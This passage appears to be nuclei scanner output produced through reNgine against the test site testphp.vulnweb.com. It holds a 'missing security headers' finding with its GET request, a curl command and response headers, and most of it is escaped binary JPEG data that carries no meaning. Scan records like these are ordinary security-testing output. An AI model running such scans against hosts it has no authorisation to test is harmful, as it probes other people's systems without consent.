05\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:22.399276179Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u